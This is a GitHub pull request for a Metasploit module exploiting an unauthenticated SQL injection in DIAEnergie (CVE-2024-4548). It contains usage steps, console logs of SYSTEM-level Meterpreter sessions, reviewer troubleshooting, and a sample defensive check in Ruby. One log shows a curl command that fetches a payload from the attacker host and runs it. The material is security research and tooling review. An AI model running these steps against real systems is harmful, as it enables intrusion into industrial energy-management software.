
DIAEnergie SQL Injection (CVE-2024-4548) #19351

Merged
merged 15 commits into from
Aug 21, 2024

Conversation

h4x-x0r
Contributor

@h4x-x0r h4x-x0r commented Jul 30, 2024

This is a new module which exploits an unauthenticated SQL injection vulnerability in DIAEnergie <= v1.10 (CVE-2024-4548).

Successful exploitation allows gaining code execution in the context of NT AUTHORITY\SYSTEM.

Verification Steps

  1. Install SQL Server. The Express version is sufficient (tested with 2019 and 2022).
  2. Install the application from the vendor.
  3. Run Metasploit:
  • Start msfconsole and enter the following commands:
  • use exploit/windows/scada/diaenergie_sqli
  • set RHOSTS <IP> (e.g., set RHOSTS 192.168.1.245)
  • exploit

This should result in a meterpreter session:

msf6 exploit(windows/scada/diaenergie_sqli) > exploit 

[*] Started reverse TCP handler on 192.168.1.241:4444 
[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.1.245:928 - The target appears to be vulnerable.
[*] 192.168.1.245:928 - Sending SQL injection...
[*] 192.168.1.245:928 - Triggering script execution...
[*] 192.168.1.245:928 - Cleaning up database...
[+] 192.168.1.245:928 - Script successfully injected, check thy shell.
[*] Sending stage (201798 bytes) to 192.168.1.245
[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400

meterpreter > shell
Process 6392 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4529]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Successfully tested on

Tested in the following deployments, with both the curl and certutil fetch commands.

  • DIAEnergie v1.10 on Windows 10 22H2
  • DIAEnergie v1.9 on Windows 10 22H2

@Admin9961

Can you explain how you obtained code execution? SQLi can usually dump user tables and password hashes, but executing arbitrary code is not always possible... Are there misconfigured permissions that allow code execution?

@h00die
Contributor

h00die commented Jul 31, 2024

Can you explain how you obtained code execution? SQLi can usually dump user tables and password hashes, but executing arbitrary code is not always possible... Are there misconfigured permissions that allow code execution?

https://github.com/rapid7/metasploit-framework/pull/19351/files#diff-f8822c9d9d61a2c7fae0163664564a5c4188ee558d1e41dc04fc42949cbdcc5aR98

@jheysel-r7 jheysel-r7 self-assigned this Aug 2, 2024
@jheysel-r7 jheysel-r7 removed their assignment Aug 13, 2024
@dledda-r7 dledda-r7 self-assigned this Aug 14, 2024
@dledda-r7
Contributor

I'm having some issues testing this target.
I noticed that for me the exploited TCP service is bound only to localhost.
However, even after doing a remote forward of the port I am getting this issue:

msf6 exploit(windows/scada/diaenergie_sqli) > exploit

[*] Command to run on remote host: curl -so %TEMP%\mnJfOecunW.exe http://192.168.136.128:8080/DeiUTq5x7uWalHO_frSVvA & start /B %TEMP%\mnJfOecunW.exe
[*] Fetch handler listening on 192.168.136.128:8080
[*] HTTP server started
[*] Adding resource /DeiUTq5x7uWalHO_frSVvA
[*] Started reverse TCP handler on 192.168.136.128:4444 
[*] 127.0.0.1:9928 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:9928 - Who is it response: 
[-] 127.0.0.1:9928 - Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

Am I missing something? Maybe some configuration?
Thanks in advance for your help!

@h4x-x0r
Contributor Author

h4x-x0r commented Aug 15, 2024

I'm having some issues testing this target. I noticed that for me the exploited TCP service is bound only to localhost. However, even after doing a remote forward of the port I am getting this issue:

msf6 exploit(windows/scada/diaenergie_sqli) > exploit

[*] Command to run on remote host: curl -so %TEMP%\mnJfOecunW.exe http://192.168.136.128:8080/DeiUTq5x7uWalHO_frSVvA & start /B %TEMP%\mnJfOecunW.exe
[*] Fetch handler listening on 192.168.136.128:8080
[*] HTTP server started
[*] Adding resource /DeiUTq5x7uWalHO_frSVvA
[*] Started reverse TCP handler on 192.168.136.128:4444 
[*] 127.0.0.1:9928 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:9928 - Who is it response: 
[-] 127.0.0.1:9928 - Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

Am I missing something? Maybe some configuration? Thanks in advance for your help!

There shouldn't be any specific configuration required. For both test environments I used a default installation without any additional steps or similar.

I do remember that it took a few minutes after system boot for the service to fully start and listen for incoming traffic. I was testing it with VMware Workstation, with a bridged and NAT configuration for the network interface. If you change the settings, you'd need to restart the service or reboot the system so that it binds correctly to the network interfaces and IPs assigned.

Does the application itself generally work, i.e., can you connect with your browser to the web interface of the application and do a login with the default credentials (root:admin)? The web server too should be listening by default on all network interfaces and be reachable through the non-loopback address.

Which version of DIAEnergie are you testing, and on which OS? I can try to do a clean install again and rerun the module, but probably not before the weekend.

The error message you are getting (NoMethodError undefined method `[]' for nil:NilClass) is probably something I can try to catch regardless, though, to better handle that kind of situation.

@dledda-r7
Contributor

dledda-r7 commented Aug 15, 2024

Hello @h4x-x0r,
We are testing in the same env, VMware (Fusion in my case) with a NAT network adapter.
I confirm I am able to see the web page of DIAEnergie; only port 928 seems to be bound specifically to localhost (I just ran netstat /a).
The version I am testing is 1.10.0.
OS: Windows Server 2019 (10.0 Build 17763).
Resolved; the issue is not related to the module, more to the setup on my end.

@dledda-r7
Contributor

After reinstalling everything again I managed to get this working. Probably something broke during the installation.

msf6 exploit(windows/scada/diaenergie_sqli) > exploit

[*] Started reverse TCP handler on 192.168.136.128:4444 
[*] 192.168.136.130:928 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.136.130:928 - The target appears to be vulnerable.
[*] 192.168.136.130:928 - Sending SQL injection...
[*] 192.168.136.130:928 - Triggering script execution...
[+] 192.168.136.130:928 - Script successfully injected, check thy shell.
[*] 192.168.136.130:928 - Cleaning up database...
[*] Sending stage (290886 bytes) to 192.168.136.130
[*] Meterpreter session 1 opened (192.168.136.128:4444 -> 192.168.136.130:49849) at 2024-08-19 05:02:59 -0400

meterpreter > sysinfo
Computer        : WIN-JR5HP085VV3
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@h4x-x0r
Contributor Author

h4x-x0r commented Aug 19, 2024

That's great! I had reinstalled it and the module was working for me fine, but I did it on Windows 10, so I wasn't sure if it is perhaps something specific to Server 2019. Glad it is working now.

Comment on lines +75 to +77
if version[0].nil?
Exploit::CheckCode::Detected
end
Contributor


When I target a service that is definitely not DIAEnergie such as SSH, this crashes.

msf6 exploit(windows/scada/diaenergie_sqli) > check

[-] 192.168.250.1:22 - Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[-] 192.168.250.1:22 - Check failed: The state could not be determined.
msf6 exploit(windows/scada/diaenergie_sqli) >

Contributor Author


Thank you for pointing that out. I've tested a couple of different scenarios to better handle unexpected replies.

Port closed:

msf6 exploit(windows/scada/diaenergie_sqli) > check

[-] 192.168.15.16:12345 - The connection was refused by the remote host (192.168.15.16:12345).
[*] 192.168.15.16:12345 - Cannot reliably check exploitability.

Port open but random service that replies with a reset:

msf6 exploit(windows/scada/diaenergie_sqli) > check

[-] 192.168.15.16:631 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[-] 192.168.15.16:631 - Check failed: The state could not be determined.

Port open but random service that returns an empty response (the case that you triggered):

msf6 exploit(windows/scada/diaenergie_sqli) > check

[*] 192.168.15.16:5433 - Received an empty response
[*] 192.168.15.16:5433 - Cannot reliably check exploitability.

I also removed some of the nesting that I had as you suggested in one of my other PRs.
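The three outcomes listed above (connection refused, connection reset, empty reply) plus the original crash on a non-DIAEnergie service all come down to one rule: never index into a version match before confirming there is one. The following Ruby sketch is an added example and is not the module's code from this PR; it mirrors the defensive check flow the thread describes in a stand-alone form. The banner format it parses ("DIAEnergie v<major>.<minor>") and the request bytes in the commented usage are assumptions made for the example, since the page does not show the real "who is it" wire format.

```ruby
# Added example, not the DIAEnergie module's own check code.
# Stand-alone sketch of a "who is it" check that cannot crash on nil:
# every unexpected reply is mapped to an explicit check outcome.
require 'socket'

# DIAEnergie <= v1.10 is affected (CVE-2024-4548), as stated in the PR.
MAX_VULNERABLE = [1, 10].freeze

# Parse a banner into [major, minor]. Returns nil when no version is present,
# which is the case the original `version[0]` access crashed on.
# The "DIAEnergie v1.10" banner format is an ASSUMPTION for this example.
def parse_version(banner)
  return nil if banner.nil? || banner.strip.empty?
  m = banner.match(/DIAEnergie\s+v?(\d+)\.(\d+)/i)
  return nil unless m
  [m[1].to_i, m[2].to_i]
end

# Classify one raw reply. Outcomes:
#   :unknown  - nil/empty reply, or some other service answered; cannot
#               reliably check exploitability
#   :detected - the product identified itself but no version was parsed
#   :appears  - version parsed and within the affected range
#   :safe     - version parsed and newer than the affected range
def classify_response(banner)
  return :unknown if banner.nil? || banner.strip.empty?
  return :unknown unless banner =~ /DIAEnergie/i # e.g. an SSH banner on the port
  version = parse_version(banner)
  return :detected if version.nil?
  (version <=> MAX_VULNERABLE) <= 0 ? :appears : :safe
end

# Run the check with a block that performs the I/O and returns the banner.
# Transport-level failures (refused, reset, timeout) become :unknown instead
# of propagating as an unhandled exception, matching the "Cannot reliably
# check exploitability" outcomes shown in the thread.
def run_check
  banner = yield
  classify_response(banner)
rescue Errno::ECONNREFUSED, Errno::ECONNRESET, Errno::ETIMEDOUT, IOError
  :unknown
end

# Usage against a live host (request bytes "WHOIS\n" are an assumption):
# result = run_check do
#   s = TCPSocket.new(host, 928)
#   s.write("WHOIS\n")
#   reply = s.read
#   s.close
#   reply
# end
```

The design point is that the I/O block is the only place a socket exception can originate, so a single rescue around it covers the refused and reset cases, while the nil and empty-string guards in classify_response cover the empty-reply case without any indexing into a possibly absent match.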

Error handling and code cleanup
Contributor

@dledda-r7 dledda-r7 left a comment


Retested after the changes. Looks good to me.

msf6 exploit(windows/scada/diaenergie_sqli) > exploit

[*] Started reverse TCP handler on 192.168.136.128:4444
[*] 192.168.136.130:928 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.136.130:928 - The target appears to be vulnerable.
[*] 192.168.136.130:928 - Sending SQL injection...
[*] 192.168.136.130:928 - Triggering script execution...
[+] 192.168.136.130:928 - Script successfully injected, check thy shell.
[*] 192.168.136.130:928 - Cleaning up database...
[*] Sending stage (290886 bytes) to 192.168.136.130
[*] Meterpreter session 1 opened (192.168.136.128:4444 -> 192.168.136.130:49972) at 2024-08-20 05:29:26 -0400

meterpreter > sysinfo
Computer        : WIN-JR5HP085VV3
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@dledda-r7 dledda-r7 merged commit 35da466 into rapid7:master Aug 21, 2024
39 checks passed
@dledda-r7
Contributor

dledda-r7 commented Aug 21, 2024

Release Notes

This adds an exploit module for CVE-2024-4548, an unauthenticated SQL Injection vulnerability able to achieve remote code execution as NT AUTHORITY\SYSTEM.

@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 21, 2024